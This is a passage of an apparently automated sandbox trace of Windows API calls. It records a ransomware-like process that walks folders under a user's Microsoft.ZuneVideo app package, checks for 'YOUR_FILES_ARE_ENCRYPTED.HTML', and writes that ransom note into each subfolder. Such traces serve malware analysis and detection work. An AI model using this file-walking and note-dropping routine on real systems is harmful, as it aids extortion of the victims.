(lpFirst="Microsoft.ZuneVideo_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.124] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe") returned 82 [0121.124] GetProcessHeap () returned 0x600000 [0121.124] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0121.125] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe" [0121.125] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\*" [0121.125] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc8507ce, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.126] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfba9af62, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfc8507ce, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0121.126] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0121.126] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.126] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC") returned 85 [0121.126] GetProcessHeap () returned 0x600000 [0121.126] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.127] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC" [0121.127] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\*" [0121.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.128] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="..", cAlternateFileName="")) returned 1 [0121.129] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0121.129] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.129] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache") returned 95 [0121.129] GetProcessHeap () returned 0x600000 [0121.129] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.130] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache" [0121.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\*" [0121.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x62eb58, cFileName=".", cAlternateFileName="")) returned 0x626978 [0121.130] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x62eb58, cFileName="..", cAlternateFileName="")) returned 1 [0121.130] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x62eb58, cFileName="..", cAlternateFileName="")) returned 0 [0121.130] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0121.130] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0121.130] GetProcessHeap () returned 0x600000 [0121.130] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.131] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.132] CloseHandle (hObject=0x31c) returned 1 [0121.132] GetProcessHeap () returned 0x600000 [0121.132] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.132] GetProcessHeap () returned 0x600000 [0121.132] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.132] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0121.132] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.132] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies") returned 97 [0121.132] GetProcessHeap () returned 0x600000 [0121.132] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.132] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies" [0121.132] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0121.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x62eb58, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0121.134] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x62eb58, cFileName="..", cAlternateFileName="")) returned 1 [0121.134] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x62eb58, cFileName="..", cAlternateFileName="")) returned 0 [0121.134] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0121.134] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0121.134] GetProcessHeap () returned 0x600000 [0121.134] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.135] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.135] CloseHandle (hObject=0x31c) returned 1 [0121.136] GetProcessHeap () returned 0x600000 [0121.136] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.136] GetProcessHeap () returned 0x600000 [0121.136] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.136] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0121.136] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.136] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory") returned 97 [0121.136] GetProcessHeap () returned 0x600000 [0121.136] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.137] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory" [0121.137] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0121.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x62eb58, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0121.137] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x62eb58, cFileName="..", cAlternateFileName="")) returned 1 [0121.137] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x62eb58, cFileName="..", cAlternateFileName="")) returned 0 [0121.137] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0121.137] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0121.137] GetProcessHeap () returned 0x600000 [0121.137] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.138] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.139] CloseHandle (hObject=0x31c) returned 1 [0121.139] GetProcessHeap () returned 0x600000 [0121.139] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.139] GetProcessHeap () returned 0x600000 [0121.139] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.139] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ebf6, dwReserved1=0x62eb50, cFileName="Temp", cAlternateFileName="")) returned 1 [0121.139] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.139] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp") returned 90 [0121.139] GetProcessHeap () returned 0x600000 [0121.139] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.139] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp" [0121.139] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\*" [0121.139] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x62eb58, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0121.140] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x62eb58, cFileName="..", cAlternateFileName="")) returned 1 [0121.140] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbba60a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfbba60a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfbba60a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x62eb58, cFileName="..", 